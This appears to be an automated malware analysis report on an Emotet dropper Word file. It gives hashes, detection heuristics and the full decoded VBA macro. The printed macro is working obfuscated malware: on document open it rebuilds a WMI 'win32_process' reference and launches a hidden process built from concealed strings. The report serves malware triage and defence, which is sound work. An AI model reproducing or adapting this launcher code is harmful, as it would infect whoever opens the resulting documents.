Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 5a0bb9b15555a25d…

MALICIOUS

Office (OLE)

251.6 KB Created: 2020-01-17 16:34:00 Authoring application: Microsoft Office Word First seen: 2020-12-25
MD5: 7ae887e5bd90d7e811f71c4b3d95b338 SHA-1: 0af4694a484bc49a3cab04eafaf28a80fa5c6aea SHA-256: 5a0bb9b15555a25dc31379feede50b11df32b3fdcb7fa379d4e0a04fab25a7df
172 Risk Score

Heuristics 7

  • ClamAV: Doc.Dropper.Emotet-7545704-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Emotet-7545704-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
    Set Uzdbsfojjee = GetObject(Cjtdozdoa)
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_open()
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 8198 bytes
SHA-256: a3e10b39797b53a5d290075e00b4400e9756ec500ffdbe66797ff877e2432d01
Detection
ClamAV: No threats found
Obfuscation or payload: likely
201 of 304 identifiers look randomly generated (e.g. 'Fehvdqvaayjkf'); 1 string-concatenation chain(s) — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Gjlsezfoy"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
Dxqfvtjemiqn
End Sub

Attribute VB_Name = "Kzpsjhogyc"
Attribute VB_Base = "0{C3A92FEA-BE50-4275-A0EF-1749FD1B1266}{32F13D05-459A-4157-9783-4BF8986355D8}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Efmhxmxcovifl"
Function Bnxyocpesy()
   Select Case Qehxxjwzffc
      Case Ftnwhtmc
         Psxzxcyarkxe = 7
         Nhinqybzvfgax = Atn(4)
         Kwlilsfzkzx = Sin(Lvdaxqiak)
      Case Kqpwrtwezj
         Mwkeihyotrv = Log(3)
         Cfdhqpzxyyvci = 6
         Dsgweirenma = CSng(Ktsuaxpnsx)
      Case Hqnxpbzahlal
         Rlaqupxnmf = ChrW(Clsdkvxb)
         Dhylbsezsguq = 1
         Nccsxtdh = Cos(Znidafnynzh)
End Select
Bgbwfyzu = ChrW(wdKeyP)
   Select Case Bygpnfbkdtulq
      Case Excbumyfhdrun
         Qmjfgytfu = 7
         Ugofgfxcvpqwh = Atn(4)
         Tzmwlncw = Sin(Bluxlritv)
      Case Qbxmxlmraqbs
         Ttxxlsjlx = Log(3)
         Cekxhclukcyp = 6
         Bpfcrasqsry = CSng(Kzjeessuhctto)
      Case Tcvdojjcdigea
         Szwgbvaytw = ChrW(Ummjdkuwqwuw)
         Wfwyoshv = 1
         Whoctebhxppp = Cos(Ctgqvvfzsbzvb)
End Select
Wljqzirwxpo = Bgbwfyzu + Kzpsjhogyc.Iqghzjatc + Kzpsjhogyc.Ewgncmzaqnzz
   Select Case Qxhmnkrauv
      Case Ahzmfzbuzst
         Nqhyitmldpm = 7
         Njdsupnj = Atn(4)
         Rcqwsdlxdwxzu = Sin(Lcocxsne)
      Case Srhxexgqup
         Wuirrildopsr = Log(3)
         Zhadexlkzl = 6
         Zyqjzvfs = CSng(Tfaftbydyqor)
      Case Pqlyhmuworimm
         Xlqhfnvcyek = ChrW(Nnlhastjjglty)
         Jwgotnbexks = 1
         Omuwaxjafamu = Cos(Offnhretc)
End Select
losd = Kzpsjhogyc.Qbkbrmbxtjm.GroupName
Wlhaarejd = Split(Wljqzirwxpo + LTrim(LTrim(losd)), "//====dsfnnJJJsm388//=")
   Select Case Gvwvfbcepcf
      Case Ywnygucfacke
         Itoncpmv = 7
         Deuysxguk = Atn(4)
         Pyrssplfsmr = Sin(Tkbocngc)
      Case Uczdndvpu
         Tuwvjzaqxs = Log(3)
         Ufhvsrwq = 6
         Qxqtlycwww = CSng(Zqfttnfmiqi)
      Case Yfhdxxqxk
         Fqncnavpgffrq = ChrW(Ikbaapqomsvty)
         Rplgnczdz = 1
         Stztnrezpfwj = Cos(Ocbjshwqan)
End Select
Bnxyocpesy = Syomkczovduk + Join(Wlhaarejd, "") + Syomkczovduk
   Select Case Aurtrithg
      Case Yxrslmqgry
         Yrwreekt = 7
         Mhanizpd = Atn(4)
         Hscqqrvzahb = Sin(Rsburpdvckvkj)
      Case Drrnllvgogani
         Sbfijvheyojt = Log(3)
         Gfhzywjqn = 6
         Vmmoqcvkkru = CSng(Hcwmszcr)
      Case Iasnkpjbnjunj
         Hmoiuqlagrv = ChrW(Xotvfnenyolva)
         Vgutbwlno = 1
         Iwamvopndyqy = Cos(Pcjxcnuzeezxb)
End Select
End Function
Function Dxqfvtjemiqn()
d = "//====dsfnnJJJsm388//=i//====dsfnnJJJsm388//=//====dsfnnJJJsm388//=n//====dsfnnJJJsm388//=m//====dsfnnJJJsm388//=gmt//====dsfnnJJJsm388//=" + ChrW(wdKeyS) + "//====dsfnnJJJsm388//=:w//====dsfnnJJJsm388//=in//====dsfnnJJJsm388//=32//====dsfnnJJJsm388//=//====dsfnnJJJsm388//=_//====dsfnnJJJsm388//=" + Kzpsjhogyc.Smfucrwlx + "//====dsfnnJJJsm388//=ro//====dsfnnJJJsm388//=ce//====dsfnnJJJsm388//=ss"
   Select Case Fouvwxvmie
      Case Mqtotqyah
         Fskdvxxhchy = 7
         Obuubjal = Atn(4)
         Ydcznofceix = Sin(Ltaplxfz)
      Case Qasveyyv
         Emztxjsweug = Log(3)
         Yjbbuponokbmz = 6
         Begmrbyythrb = CSng(Vtvjbumdw)
      Case Rzpcygypz
         Ntpxzkhu = ChrW(Jfsqgcyagyh)
         Zciwvatme = 1
         Fbudubvcashu = Cos(Reaotxtknp)
End Select
E = "//====dsfnnJJJsm388//="
   Select Case Anqwvooniww
      Case Jzpizelwtuexz
         Fhgurtydmxgh = 7
         Uphgwonf = Atn(4)
         Gztgtlzwx = Sin(Apcsflwdk)
      Case Ktzexqcchaaan
         Rjaykjgvtzenr = Log(3)
         Cwnipagooit = 6
         Hzooaftmcl = CSng(Dxffsdlzqxe)
      Case Czlvmqqou
         Lqmljeakeulc = ChrW(Veivvjvbjx)
         Qpvszjklt = 1
         Aqmxujkrxkm = Cos(Itydyjhofb)
End Select
Swyxlwtjt = Split("//====dsfnnJJJsm388//=//====dsfnnJJJsm388//=w//====dsfnnJJJsm388//=//====dsfnnJJJsm388//=" + d + T, E)
   Select Case Bhcmjswo
      Case Kswkqbzwaxut
         Kmwesbxzqvcbj = 7
         Vvwmmpurguy = Atn(4)
         Iuiipgcxvrwnv = Sin(Aiorfffb)
      Case Ffquqktez
         Ntmcqtzdayrer = Log(3)
         Fgrsdskajamcf = 6
         Jwufmobp = CSng(Fxxiobydse)
      Case Gmdctdberu
         Pvjlejerchyun = ChrW(Znyncpwpicjv)
         Ktlbztsrmzi = 1
         Kyojpbhcqshui = Cos(Bjuogdson)
End Select
Cjtdozdoa = Join(Swyxlwtjt, "")
   Select Case Catwrded
      Case Qythpmgn
         Cfbugjxue = 7
         Mrihyakca = Atn(4)
         Vmoighlitvy = Sin(Wyzqigkzawdhk)
      Case Lvlntokpfxc
         Wwloukkabu = Log(3)
         Doupkbvhuwxk = 6
         Jmjtsfqb = CSng(Lpmzpqkbr)
      Case Zqzvvgiozyb
         Byqhbodclpev = ChrW(Relwssmkwjywz)
         Dgkmtyradz = 1
         Moavzgkqjnb = Cos(Frcgjeouph)
End Select
Set Uzdbsfojjee = GetObject(Cjtdozdoa)
   Select Case Ajgosjqkki
      Case Gvpcscchagbjy
         Egioydbjfvl = 7
         Xvbaaeubvwqp = Atn(4)
         Itiwqqtle = Sin(Gtemkhgpjjfe)
      Case Tioikrzszt
         Zvwzlragtkpol = Log(3)
         Zxudpgmxie = 6
         Juoukwoiltjy = CSng(Vqisaxvhz)
      Case Paqmyouix
         Fqfswgzgnw = ChrW(Lwopeeycvt)
         Wxvnfpqqojks = 1
         Aoishiape = Cos(Ypdynqlakw)
End Select
Kxyzdhetd = Kzpsjhogyc.Qondygelnww.Tag
Acsvgeyxeodv = Cjtdozdoa + ChrW(wdKeyS) + Kzpsjhogyc.Jfqiubxiqf.Tag + Kxyzdhetd
   Select Case Qcplgmegez
      Case Vwynwkiuxtr
         Hxgvdynvdpctj = 7
         Bpdnfmpfi = Atn(4)
         Rxzowkgpypy = Sin(Blsshvun)
      Case Siqedjsr
         Pgqwossmuu = Log(3)
         Ecmuuxym = 6
         Zvggggdf = CSng(Azluvvdodhsyk)
      Case Nriputku
         Uqhmliont = ChrW(Qryytjjih)
         Qcsouqldqf = 1
         Aevcrzekqn = Cos(Zkqbjbmhgkaft)
End Select
Aptjcvlw = Acsvgeyxeodv + Kzpsjhogyc.Smfucrwlx
   Select Case Dgqeqlqagnkkj
      Case Eeuavfhwemf
         Wxahpeulf = 7
         Sigitnmonro = Atn(4)
         Qxsvjmskd = Sin(Jmcueofz)
      Case Inzzcqzr
         Hbsrsmzbsaf = Log(3)
         Cyhlsjylpjehk = 6
         Gvssiswitkcsp = CSng(Mytoxavfh)
      Case Fsrokisdvxhmf
         Qnaprjgix = ChrW(Vwvlpllmmeq)
         Uzljielo = 1
         Jherqmyjujw = Cos(Ijhwbtubaiavs)
End Select
Set Dxqfvtjemiqn = GetObject(Aptjcvlw)
   Select Case Hidlhjht
      Case Tgrxbvapgi
         Wmgoeeqeudfe = 7
         Yuznpsjaz = Atn(4)
         Mjjtpzurnmq = Sin(Fdcyqpbmdvxg)
      Case Sqjvngyruglf
         Mgthphimpk = Log(3)
         Ydjomnzgbb = 6
         Cytniwnllqa = CSng(Prijgbyl)
      Case Viguxfxil
         Eqnvdtxy = ChrW(Clmxwrxvz)
         Yryeccpgo = 1
         Vykavocibng = Cos(Wtwbnanlwxgz)
End Select
Dxqfvtjemiqn. _
showwindow = False
   Select Case Cvhawajh
      Case Twqjfzucvwo
         Lbhdtgju = 7
         Fpqlzxdzks = Atn(4)
         Tuhulbrx = Sin(Jtwzpxqalvd)
      Case Tonverxdbi
         Mvyvhcsir = Log(3)
         Paigjkgxyijog = 6
         Mffkiknrc = CSng(Edskdtmryvwl)
      Case Ullzcgsybpmc
         Mbiferfdeneqc = ChrW(Lqurrnybsavyg)
         Ybmoewmq = 1
         Nqhyumedzpysk = Cos(Oaqfjszbap)
End Select
Do While Uzdbsfojjee. _
Create(pok & Bnxyocpesy, Hibvcqsebdumf, Dxqfvtjemiqn, Mlnvjgbnd)
Loop
   Select Case Dufgvakzecgwr
      Case Pwtfldmmss
         Rilstbgytjmv = 7
         Tbcthsgt = Atn(4)
         Tlivrhnnm = Sin(Rsknukqrfkyy)
      Case Kjylpnxyhy
         Lhmwyiaicjsg = Log(3)
         Pcfuvnxlg = 6
         Cxtvslmfbzj = CSng(Lpybgbrsyh)
      Case Smcuvzaniwlg
         Yfaljgwwjf = ChrW(Fehvdqvaayjkf)
         Raoerowdl = 1
         Xrywdwfzuwg = Cos(Vknjzvpfjyfv)
End Select
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.